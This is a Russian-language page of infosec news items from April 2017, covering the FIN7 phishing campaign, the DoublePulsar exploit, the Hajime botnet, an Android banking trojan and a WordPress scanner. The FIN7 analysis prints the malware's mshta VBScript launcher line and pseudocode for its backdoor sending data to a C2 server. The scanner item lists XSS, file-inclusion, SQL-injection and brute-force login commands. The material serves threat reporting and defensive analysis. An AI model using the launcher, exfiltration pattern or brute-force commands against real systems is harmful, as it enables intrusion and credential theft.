Новости мира информационной безопасности. Расследование и реагирование на инциденты. Кибербезопасность.

Новости информационной безопасности

FIN7 Evolution and the Phishing LNK

FIN7 is a financially-motivated threat group that has been associated with malicious operations dating back to late 2015. FIN7 is referred to by many vendors as “Carbanak Group”, although we do not equate all usage of the CARBANAK backdoor with FIN7. FireEye recently observed a FIN7 spear phishing campaign targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations.

In a newly-identified campaign, FIN7 modified their phishing techniques to implement unique infection and persistence mechanisms. FIN7 has moved away from weaponized Microsoft Office macros in order to evade detection. This round of FIN7 phishing lures implements hidden shortcut files (LNK files) to initiate the infection and VBScript functionality launched by mshta.exe to infect the victim.

In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file – two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. The subjects and attachments were themed as complaints, catering orders, or resumes. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process.

Infection Chain

While FIN7 has embedded VBE as OLE objects for over a year, they continue to update their script launching mechanisms. In the current lures, both the malicious DOCX and RTF attempt to convince the user to double-click on the image in the document, as seen in Figure 1. This spawns the hidden embedded malicious LNK file in the document. Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object.

By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action.

Figure 1: Malicious FIN7 lure asking victim to double click to unlock contents

The malicious LNK launches “mshta.exe” with the following arguments passed to it:

vbscript:Execute("On Error Resume Next:set w=GetObject(,""Word.Application""):execute w.ActiveDocument.Shapes(2).TextFrame.TextRange.Text:close")

The script in the argument combines all the textbox contents in the document and executes them, as seen in Figure 2.

Figure 2: Textbox inside DOC

The combined script from Word textbox drops the following components:


Also, the script creates a named schedule task for persistence to launch “58d2a83f7778d5.36783181.vbs” every 25 minutes.

VBScript #1

The dropped script “58d2a83f7778d5.36783181.vbs” acts as a launcher. This VBScript checks if the “58d2a83f777942.26535794.ps1” PowerShell script is running using WMI queries and, if not, launches it.

PowerShell Script

“58d2a83f777942.26535794.ps1” is a multilayer obfuscated PowerShell script, which launches shellcode for a Cobalt Strike stager.

The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:


Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode. If unable to contact the C2 server initially, the shellcode is configured to reattempt communication with the C2 server address in the following pattern:


VBScript #2

“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:


This script then executes “58d2a83f777716.48248237.vbs”, which is a variant of FIN7’s HALFBAKED backdoor.

HALFBAKED Backdoor Variant

The HALFBAKED malware family consists of multiple components designed to establish and maintain a foothold in victim networks, with the ultimate goal of gaining access to sensitive financial information. This version of HALFBAKED connects to the following C2 server:


This version of HALFBAKED listens for the following commands from the C2 server:

All communication between the backdoor and attacker C2 are encoded using the following technique, represented in pseudo code:

Function send_data(data)
                random_string = custom_function_to_generate_random_string()
                encoded_data = URLEncode(SimpleEncrypt(data))
                post_data("POST”, random_string & "=" & encoded_data, Hard_coded_c2_url,

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information based on our investigations of a variety of topics discussed in this post, including FIN7 and the HALFBAKED backdoor. Click here for more information.

Persistence Mechanism

Figure 3 shows that for persistence, the document creates two scheduled tasks and creates one auto-start registry entry pointing to the LNK file.

Figure 3: FIN7 phishing lure persistence mechanisms

Examining Attacker Shortcut Files

In many cases, attacker-created LNK files can reveal valuable information about the attacker’s development environment. These files can be parsed with lnk-parser to extract all contents. LNK files have been valuable during Mandiant incident response investigations as they include volume serial number, NetBIOS name, and MAC address.

For example, one of these FIN7 LNK files contained the following properties:

From this LNK file, we can see not only what the shortcut launched within the string data, but that the attacker likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017.

Example Phishing Lures

FIN7 April 2017 Community Protection Event

On April 12, in response to FIN7 actively targeting multiple clients, FireEye kicked off a Community Protection Event (CPE) – a coordinated effort by FireEye as a Service (FaaS), Mandiant, FireEye iSight Intelligence, and our product team – to secure all clients affected by this campaign.

Дата: 2017-04-25 17:26:04

Источник: http://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html

Зловред DoublePulsar из арсенала АНБ пошел в массы

Если вы участник «красной команды» или регулярно получаете от таковой результаты пентестинга, вы наверняка в курсе, что серверы Windows уязвимы к атакам сетевого червя Conficker, который все еще встречается в дикой природе, хотя патч для этой бреши (MS08-067) был выпущен 10 лет назад.

Прошло немногим более двух недель со времени публикации ShadowBrokers новой порции хакерского инструментария АНБ, а эксперты уже тревожатся, что зловред DoublePulsar, загружаемый на Windows в результате эксплойта, станет таким же долгожителем и уязвимость в серверах, закрытая с выходом MS17-010, будет проявляться при пентестинге гораздо дольше, чем брешь, используемая Conficker.

Обновление MS17-010, устранившее ряд уязвимостей в Windows SMB, было выпущено в марте. АНБ предположительно использовала эти бреши для загрузки DoublePulsar с помощью эксплойтов EternalBlue, EternalChampion, EternalSynergy и EternalRomance, являющихся частью эксплойт-платформы Fuzzbunch. DoublePulsar – это сложная, работающая из памяти нагрузка режима ядра, ориентированная на 64-битные серверные системы с архитектурой x86 и позволяющая в ходе атаки исполнять любые шелл-коды.

«Это полноценная нагрузка ring0, обеспечивающая полный контроль над системой с возможностью делать с ней все, что захочется», – подтвердил старший ИБ-аналитик RiskSense Шон Диллон (Sean Dillon). Диллон первым произвел реверс-инжиниринг DoublePulsar и в минувшую пятницу опубликовал результаты.

«Она будет существовать в сетях долгие годы, – предупреждает эксперт. – Предыдущей крупной уязвимостью такого класса была MS08-067, и ее до сих пор много где находят. Я с ней сталкиваюсь повсеместно. Нынешний патч для Windows – самый критичный после нее».

В ходе сканирования интернета Дэн Тентлер (Dan Tentler), учредитель и гендиректор Phobos Group, обнаружил, что 3,1% уязвимых машин уже заражены (62-65 тыс. в количественном выражении), и число таких заражений, скорее всего, будет расти. «Это настоящая бойня», – говорит эксперт.

Начиная с 7 апреля, даты появления нового дампа от ShadowBrokers, хакеры прилежно скачивают и используют эксплойты АНБ в атаках против уязвимых компьютеров. По свидетельству Мэтью Хики (Matthew Hickey), основателя британской консалтинговой компании Hacker House, злоумышленники также публикуют на YouTube и других ресурсах документы и видеоролики, скачивание которых чревато эксплойтом.

«Тот факт, что эти инструменты атаки начали использоваться в дикой природе, неудивителен, – говорит Хики. – Это доказывает, что инструменты хорошо сделаны, весьма эффективны и не требуют больших технических навыков, поэтому они быстро оседают в хакерских репозиториях и тулкитах. В итоге авторы атак используют их как есть».

По словам Джейка Уильямса (Jake Williams), президента Rendition InfoSec, также известного как MalwareJake, на настоящий момент некоторые эксплойты применяются по самой простой схеме: атакующий задает значение, к примеру, удаленный IP-адрес, и запускает код на исполнение. «Мы называем такие эксплойты ключами от королевства», – говорит эксперт.

DoublePulsar работает на ранних Windows Server, использующих устаревшие версии механизма защиты ядра PatchGuard. В новейших версиях Windows, таких как Windows 10, проверка состояния ядра улучшена и способна предотвратить подобные попытки закрепления в ОС. Установив DoublePulsar на скомпрометированный хост, автор атаки получает возможность загрузить дополнительных зловредов или исполняемые файлы.

Таким образом, данная уязвимость стремительно теряет позиции эксклюзива, доступного лишь хорошо обеспеченным хакерам, и переходит в разряд оружия массового поражения. Не за горами то время, когда эти эксплойты начнут использоваться для доставки программ-вымогателей, ботов и других зловредов.

Пока все обнаруженные itw атаки работают по одной схеме: злоумышленник отправляет на сервер вредоносный SMB-запрос и ждет ответ на том порту, на котором работает SMB-служба (445). Случаи использования зловредом уже работающего порта, по словам Тентлера, – большая редкость. «Он не открывает новые порты, – поясняет эксперт. – Если бэкдор уже на месте, он имеет возможность сделать четыре вещи: ответить на особый пинг-запрос (например, heartbeat-вида), деинсталлироваться, загрузить шелл-код или запустить DLL на хосте. И ничего более. Его единственное назначение – обеспечить скрытый канал для загрузки других зловредов или исполняемых файлов».

С точки зрения атакующего эта схема имеет серьезный недостаток: поскольку зловред живет в памяти, он исчезает после перезагрузки. В DoublePulsar также предусмотрена команда kill или burn, выполнение которой не избавит жертву от инфекции, но предотвратит использование бэкдора аутсайдерами.

Как бы то ни было, ИБ-исследователей несколько обескуражило большое количество уязвимых машин в интернете, хотя со времени выпуска патча прошло уже шесть недель. «Это, действительно, большая проблема, – признал Хики. – Такого уровня атак мы не видывали со времен Conficker, и тем более такой легкости в использовании. Инструмент спонсируемых государством хакеров стал доступным всем пользователям интернета с разными нуждами. Отныне его будут применять для компрометации и воздействия на системы долгие годы».

Дата: 2017-04-25 16:29:15

Источник: https://threatpost.ru/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/21627/

Очередной ежеквартально-рекордный патч от Oracle

На этот раз 299 уязвимостей, из которых более 100 можно использовать удаленно. Из заметного: 47 приходится на Oracle Financial Services Applications, по 39 на MySQL и Oracle Retail Applications, 31 на Oracle Fusion Middleware, 8 на Java и 3 на Oracle Database Server.
обсуждение | Telegram | Facebook | Twitter

Дата: 2017-04-25 15:08:00

Источник: https://bugtraq.ru/rsn/archive/2017/04/01.html

Network Forensics Training in London

The Flag of the United States by Sam Howzit (CC BY 2.0)

People sometimes ask me when I will teach my network forensics class in the United States. The US is undoubtedly the country with the most advanced and mature DFIR community, so it would be awesome to be able to give my class there. However, not being a U.S. person and not working for a U.S. company makes it rather difficult for me to teach in the United States (remember what happened to Halvar Flake?).

So if you’re from the Americas and would like to take my network forensics class, then please don’t wait for me to teach my class at a venue close to you – because I probably won’t. My recommendation is that you instead attend my upcoming training at 44CON in London this September.

London Red Telephone Booth Long Exposure by negativespace.co (CC0)

The network forensics training in London will cover topics such as:

The first day of training will focus on analysis using only open source tools. The second day will primarily cover training on commercial software from Netresec, i.e. NetworkMiner Professional and CapLoader. All students enrolling in the class will get a full 6 month license for both these commercial tools.


Hope to see you at the 44CON training in London!

Facebook Share on Facebook  Twitter Tweet  Reddit Submit to reddit.com

Дата: 2017-04-25 14:33:00

Источник: http://www.netresec.com/?page=Blog&month=2017-04&post=Network-Forensics-Training-in-London

WPSeku - Simple Wordpress Security Scanner

WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

  __      ___ __  ___  ___| | ___   _    
  \ \ /\ / / '_ \/ __|/ _ \ |/ / | | |   
   \ V  V /| |_) \__ \  __/   <| |_| |   
    \_/\_/ | .__/|___/\___|_|\_\\__,_|   
[--] WPSeku - Wordpress Security Scanner  
[--] WPSeku - v0.1.0                      
[--] Momo Outaadi (@M4ll0k)               
[--] https://github.com/m4ll0k/WPSeku   

Usage: wpseku.py --url URL

 -u --url Site URL (e.g: http://site.com)
 -e --enum 
  [u:  Usernames Enumeration
 -p --plugin 
  [x:  Search Cross Site Scripting vuln
  [l:  Search Local File Inclusion vuln
  [s:  Search SQL Injection vuln
 -t --theme 
  [x:  Search Cross Site Scripting vuln
  [l:  Search Local File Inclusion vuln
  [s:  Search SQL Injection vuln
 -b --brute 
  [l:  Bruteforce password login
  [x:  Bruteforce password login via XML-RPC
 --user  Set username, try with enum users
 --wordlist Set wordlist
 -h --help Show this help and exit
  wpseku.py -u www.site.com
  wpseku.py -u www.site.com -e [u]
  wpseku.py -u site.com/path/wp-content/plugins/wp/wp.php?id= -p [x,l,s]
  wpseku.py -u site.com --user test --wordlist dict.txt -b [l,x]


Дата: 2017-04-25 14:14:08

Источник: http://www.kitploit.com/2017/04/wpseku-simple-wordpress-security-scanner.html

Новый зловред порабощает Интернет вещей

«Лаборатория Касперскогоinfo-icon» рассказала об активности зловреда Hajime, который в настоящее время активно заражает устройства Интернета вещей и создает из них ботнет. На данный момент под контролем Hajime находятся почти 300 тысяч гаджетов по всему миру.

Потенциально все они готовы выполнять команды злоумышленников, однако реальная цель Hajime до сих остается неизвестной. В переводе с японского Hajime означает «начало». Первые признаки активности этого зловреда были замечены в октябре 2016 года. Наибольшее число зараженных устройств сейчас зафиксировано в Иране – около 20%. Следом идут Бразилия (9%) и Вьетнам (8%). Россия также оказалась одной из привлекательных стран для злоумышленников – 7,5% устройств ботнета расположены в России.  


Распределение зараженных Hajime устройств по странам


Исследователи отмечают, что в Hajime нет функций, позволяющих осуществлять атаки; на данный момент зловред содержит только модуль, отвечающий за его распространение. Для заражения устройств Hajime использует разные техники, но чаще отдает предпочтение брутфорс-атакам, то есть методу подбора пароля через перебирание возможных комбинаций. После успешного заражения зловред предпринимает меры для сокрытия своего присутствия на устройстве.

Hajime не слишком избирателен – он готов заразить любой гаджет, подключенный к Интернету. Однако в числе его жертв все же преобладают видеозаписывающие устройства, веб-камеры и роутеры. Примечательно, что зловред избегает некоторых сетей, среди них, в частности, сети General Electric, Hewlett-Packard, почтовой службы США и Министерства обороны США.

«Самая большая интрига Hajime – это его цель. Ботнет быстро растет, а для чего до сих пор неизвестно. Мы не заметили присутствия Hajime в каких-либо атаках или другой вредоносной активности. Тем не менее не стоит недооценивать угрозу. Мы рекомендуем всем владельцам устройств Интернета вещей сменить пароли на гаджетах, при этом выбирать сложные комбинации, которые нелегко угадать, а также по возможности обновить ПО от производителя», – отметил Константин Зыков, старший аналитик «Лаборатории Касперского».

Дата: 2017-04-25 13:51:00

Источник: https://www.anti-malware.ru/news/2017-04-25/22828

В Санкт-Петербурге ждут "Код ИБ"

Санкт-Петербург в этом году станет одним из 26 городов проведения “Кода ИБ”. Конференция традиционно объединит на одной площадке ИБ-экспертов двух столиц.

Секцию “Тренды” проведут Рустем Хайретдинов (InfoWatch), Артем Скакун (Управление Роскомнадзора по Северо-Западному ФО) и Николай Гончаров (ПАО “МТС”).

В секции “Технологии” выступят ведущие разработчики СЗИ. Темами докладов станут современные киберугрозы, шифровальщики, целенаправленные атаки, крипотомаршрутизация, сетевая безопасность, защита корпоративного периметра, ransomware.

Секция “Управление” расскажет о  DLP, кадрах в ИБ и “игре в безопасность” (“Лаборатория Касперского”, спонсор секции). Также здесь пройдет мастер-класс Рустема Хайретдинова по защите веб-приложений. Спикер расскажет, почему статистика взломов веб-приложений только вырастет, и что с этим делать.

В заключительной секции “Опыт” знаниями в области мобильных бот-сетей поделятся эксперт отдела обеспечения ИБ ПАО “МТС” Николай Гончаров (г. Москва) и начальник отдела информационной безопасности СПб ГУП “АТС Смольного” Константин Мартынов (г. Санкт-Петербург).

Участие для сотрудников ИТ- и ИБ- департаментов, а также представителей СМИ бесплатное. Регистрация и аккредитация на сайте http://codeib.ru/sankt-peterburg/

Дата: 2017-04-25 13:43:55

Источник: http://www.iso27000.ru/novosti-i-sobytiya/v-sankt-peterburge-zhdut-kod-ib

Как я устроился в компанию, специализирующуюся на ИБ, будучи «нубом» в их проф. деятельности

События нашей жизни очень часто разворачиваются непредсказуемо, бывает так, что ветер перемен приходит внезапно, принося с собой совершенно новые, ранее неизведанные перспективы, которые поначалу могут казаться непостижимыми из-за своей уникальной среды и узкоспециализированной направленности.

В данной статье я хочу поделиться с вами реальным случаем из своей собственной жизни, рассказать о ситуации в которой мог, а скорее всего оказывался, каждый человек, который когда-либо находился в поисках новых перспектив, связанных со своим трудоустройством.

Помимо этого, в своей статье я хочу затронуть общие черты человеческой психологии, относительно различных трудностей, возникающих в процессе всей нашей жизни.

Начну, пожалуй, с краткого рассказа о том, как всё начиналось.
Некоторое время я находился в поисках занятости и претендовал на должность, связанную с рекламой, маркетингом, SMM, PR. Поскольку в этом я знаю толк, могу проявить себя и чувствую интерес к этой сфере деятельности, я рассчитывал на то, что проблем у меня не будет в любой сфере, связанной с pr-услугами.

Я получил приглашение от одной из компаний, на которую оставил свой отклик в HH. Как оказалось, деятельность компании неразрывно связана с информационной безопасностью. Я успешно прошёл собеседование, ознакомился с услугами компании и собрался приступать к разработке эффективной pr-компании. Буду честен и сразу скажу, что ранее я не то, что не связывался с аналогичной деятельностью, но даже и не знал о таких аббревиатурах как ИБ и ИТ. То есть с информационной безопасностью в своей жизни я не сталкивался вовсе. В первые дни было непонятно абсолютно всё — от точного предназначения реализуемых услуг до «странных» разговоров технического отдела, с которым я посещал общую столовую компании. « «Питон», «си», «джава скрипт» — что всё это значит?» — задавался я вопросами в первый рабочий день. Руководители компании объясняли необходимую информацию доступно, при этом многое мне воспринимать было крайне трудно, ведь я сталкивался впервые с таким видом деятельности. Впоследствии, также оказалось, что прежние мои методы продвижения здесь либо не работали, либо не приносили желаемого результата. Это было связано с тем, что ранее в маркетинговой сфере разрабатываемые мною рекламные стратегии в основном были направлены на продукт массового потребления, а не на узкоспециализированный сектор. А самое интересное заключалось в том, что в организации уже была выработана рекламная кампания, которая отлично работала и без моего участия. То есть я не пришёл на «голое поле», я пришёл в компанию с чётко отстроенной линией продвижения своих продуктов, с уже имеющимся высоким рейтингом среди своей целевой аудитории. Что же делать, если ранее имел совершенно иной опыт в рекламе и не работал с компаниями с уже выстроенной рекламной структурой? Нужно поддерживать и усовершенствовать те методы, которые имеются в наличии, а также искать новые инструменты по продвижению продуктов компании.

Я начал изучать предложение компании, заострять внимание на вопросах технического характера предлагаемых продуктов, искать аналогию подобных предложений в интернет-ресурсе, исследовать саму деятельность ИБ и читать абсолютно всё, что касается данной тематики. Спустя некоторое время, я начал вникать в новую для меня сферу деятельности, понимать «язык» технического отдела, иметь явное представление о возможностях, предназначении и функционале предлагаемых продуктов компании. Я узнал такие понятия как «web application firewall», этичный хакинг, по которому даже имеются специализированные курсы, познакомился с понятием «форензика» и множеством других аббревиатур и терминов. Я стал частью команды молодых специалистов, которые постоянно учатся, развиваются и преуспевают в поставленных для них задачах.
И несмотря на то, что в первое время в новой для меня деятельности сковывало ощущение собственного угнетения, я не сдался и не сменил место работы, я упорствовал и предпринимал всё возможное для того, чтобы понять и научиться. Как сказано в знакомой всем нам фразе: «Век живи — век учись», с чем я полностью согласен. Учиться чему-то новому никогда не поздно, даже если поначалу это кажется непостижимым для вас.

И на этом я бы мог завершить свою статью, но нет! Конечная цель ещё не достигнута! Я очень хотел бы, чтобы моя статья стала посланием для вас. Не только для читателей «хабра», но и для всех, кто сомневается в возможности выбрать что-то новое или же начать что-либо с нуля. Каждый наш навык когда-то начинался с нуля. Это потом мы привыкаем к чему-либо и думаем, что всегда это умели. Но, нет. Человек рождается и учится на протяжении всей своей жизни, познавая новшества и приобретая опыт. Поэтому, не бойтесь ничего нового! Ищите и исследуйте! Непостижимых задач не существует, всегда проявляйте усилие, труд и упорство. Не жалейте своего времени для решения собственных задач. Время в любом случае безвозвратно утекает от нас, тогда не лучше ли проводить его с пользой, решая собственные проблемы, а не просто думая о них, перетирая свои мысли «о насущном» снова и снова.

Будьте неистовы! Каждый свой день вы должны бороться. Бороться со своей ленью, со своими сомнениями, с привычкой откладывать дела и задачи «на потом». Пусть вашей повседневной задачей станет возможность сделать свой новый день лучше, чем предыдущий. Не думайте о прошлом, не угнетайте себя мыслями о том, что не успели сделать, о том, что не сделали, о том, что когда-либо сделали неправильно. Каждый новый день настраивайте себя позитивно на решение абсолютно любых задач. Помните фразу — «как вы яхту назовёте, так она и поплывёт» — аналогичным образом нужно настраивать наши ежедневные мысли, особенно при выполнении каких-либо задач. Никогда не настраивайте себя на то, что задача невыполнима, перестаньте думать об этом. Вместо этого ищите возможные инструменты для решения задачи, ищите всеми доступными способами! Однако, совсем забывать об ошибках и прошлых неудачах не стоит. Как только забудете – неприятность может повториться с вами вновь. Если же какие-то моменты из прошлого угнетают и давят на вас, то выработайте в себе привычку думать об этом как о чистом «прошедшем», неизбежно канувшем в «лету времён». Если говорить более простым языком, то кратко будет звучать так: не углубляйтесь в прошлое, живите настоящем и думайте о своём будущем.

Если данную статью вы нашли для себя интересной, то в следующий раз я расскажу вам об инструментах достижения состояния «жизненной идиллии». О том, как перестать думать о нерешённых проблемах и скородящих душу вопросах. Как начать чувствовать себя позитивно и находить вдохновение для решения важных рабочих и жизненных задач.

Дата: 2017-04-25 13:42:33

Источник: https://habrahabr.ru/post/327350/

Троян перехватывает пароли от мобильного банка, Facebook и Instagram

ESET обнаружила на Googleinfo-icon Play новую вредоносную программу. Троян Androidinfo-icon/Charger.B крадет пароли от мобильных приложений банков и социальных сетей, с его помощью можно атаковать почти любое приложение.

Троян маскируется под приложение-фонарик Flashlight LED Widget. После установки и запуска программа запрашивает права администратора устройства и разрешение открывать окна поверх других приложений.

Далее троян отправляет на командный сервер злоумышленников информацию об устройстве, включая список установленных приложений, и фотографию владельца, сделанную фронтальной камерой.



Если зараженное устройство находится в России, Украине или Беларуси, троян деактивируется. В ESET предполагают, что атакующие таким образом пытаются избежать уголовного преследования в своей стране.

Когда жертва запускает интересующее злоумышленников приложение (например, мобильный банк или соцсеть), на экране появится поддельное окно для ввода данных. Логины, пароли или данные банковских карт, введенные в фишинговом окне, будут отправлены злоумышленникам.

В ходе исследования специалисты ESET наблюдали перехват паролей Commbank, NAB и Westpac Mobile Banking, а также Facebook, Instagram и Google Play. Опасность трояна в том, что атакующие могут перенацелить его почти на любое приложение.

Троян может блокировать экран устройства, выводя сообщение о загрузке обновлений. В ESET предполагают, что эта функция используется при краже средств со счета. Злоумышленники удаленно блокируют смартфон, чтобы жертва не заметила подозрительную активность и не смогла принять меры.

Дата: 2017-04-25 13:38:25

Источник: https://www.anti-malware.ru/news/2017-04-25/22826

Как хакеры атакуют веб-приложения: боты и простые уязвимости

Общедоступные веб-приложения являются привлекательной мишенью для злоумышленников. Атаки на веб-приложения открывают перед ними широкие возможности: доступ к внутренним ресурсам компании, чувствительной информации, нарушение функционирования приложения или обход бизнес-логики – практически любая атака может принести финансовую выгоду для злоумышленника и убытки, как финансовые, так и репутационные – для владельца веб-приложения. Кроме того, под угрозой находятся и пользователи веб-приложений, поскольку успешные атаки позволяют похищать учетные данные, выполнять действия на сайтах от лица пользователей, а также заражать рабочие станции вредоносным ПО.

При исследовании атак на веб-приложения мы, в первую очередь, ставили перед собой задачу установить, какие атаки пользуются наибольшей популярностью у злоумышленников и каковы возможные мотивы их действий, а также определить основные источники угроз для различных отраслей. Такие данные позволяют понять, каким аспектам следует уделить внимание при обеспечении безопасности веб-приложений. Кроме того, мы рассмотрим распределение типов атак и активности злоумышленников в зависимости от сферы деятельности компании, а также динамику изменения характера атак в течение года.

Для сбора исходных данных по атакам мы использовали данные, полученные в ходе пилотных проектов по внедрению межсетевого экрана прикладного уровня PT Application Firewall (PT AF) в 2016 году. В пилотных проектах принимали участие государственные учреждения, организации сферы образования, финансов, транспорта, промышленности и IT. Среди рассматриваемых систем присутствуют как российские компании, так и зарубежные. Все приведенные в данном исследовании примеры атак были проверены вручную на предмет ложных срабатываний и являются достоверными. Читать дальше →

Дата: 2017-04-25 13:30:02

Источник: https://habrahabr.ru/post/327344/